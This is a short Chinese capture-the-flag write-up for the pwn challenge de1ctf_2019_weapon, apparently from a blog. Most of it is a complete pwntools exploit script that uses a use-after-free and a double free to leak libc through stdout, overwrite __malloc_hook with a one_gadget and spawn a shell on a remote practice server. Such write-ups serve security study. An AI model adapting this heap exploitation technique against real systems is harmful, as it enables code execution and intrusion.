de1ctf_2019_weapon

这题我多了一个换行搞了老久了服了还是tcl

思路

有uaf通过写IO来得到libc地址然后通过double free来拿到shell
exp:

#!/usr/bin/python2
from pwn import *
p=0
def pwn():
	global p
	#p=process('./de1ctf_2019_weapon')
	p=remote('node3.buuoj.cn',29212)
	elf=ELF('./de1ctf_2019_weapon')
	libc=elf.libc

	def add(size,idx,name):
		p.sendlineafter('>>','1')
		p.sendlineafter(': ',str(size))
		p.sendlineafter(': ',str(idx))
		p.sendafter(':',name)

	def delete(idx):
		p.sendlineafter('>>','2')
		p.sendlineafter(':',str(idx))

	def edit(idx,data):
		p.sendlineafter('>>','3')
		p.sendlineafter(': ',str(idx))
		p.sendafter(':',data)


	payload=p64(0)*1+p64(0x71)
	add(0x28,0,payload)
	add(0x18,1,'cccc')
	add(0x38,2,'dddd')
	add(0x60,3,'\x02'*2)
	add(0x60,4,'aaaa')
	add(0x60,5,'bbbb')
	delete(3)
	delete(4)
	edit(4,'\x10')
	add(0x60,8,'dd')
	add(0x60,7,p64(0)*3+p64(0x21)+p64(0)*3+p64(0xb1))
	delete(2)
	delete(3)
	add(0x38,2,'aaa')
	edit(3,'\xdd\x85')
	payload='\x00'*(0x40+3-0x10)+p64(0x1800)+'\x00'*0x19
	payload1='\x00'*0x33+p64(0xfbad3c80)+3*p64(0)+p8(0)
	add(0x60,8,'aaa')
	add(0x60,9,payload1)
	libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3c5600
	malloc_hook=libcbase+libc.sym['__malloc_hook']
	o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
	one_gadget=libcbase+o_g[3]
	delete(3)
	delete(4)
	delete(3)
	add(0x60,3,p64(malloc_hook-0x23))
	add(0x60,6,'doudou')
	add(0x60,4,'doudou1')
	add(0x60,8,'a'*0x13+p64(one_gadget))
	log.success('libcbase: '+hex(libcbase))
	p.sendlineafter('>>','1')
	p.sendlineafter(': ',str(0x20))
	p.sendlineafter(': ',str(8))
	p.interactive()
	return True

if __name__=="__main__":
	while 1:
		try:
			if pwn()==True:
				break
		except Exception as e:
			p.close()
			continue

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值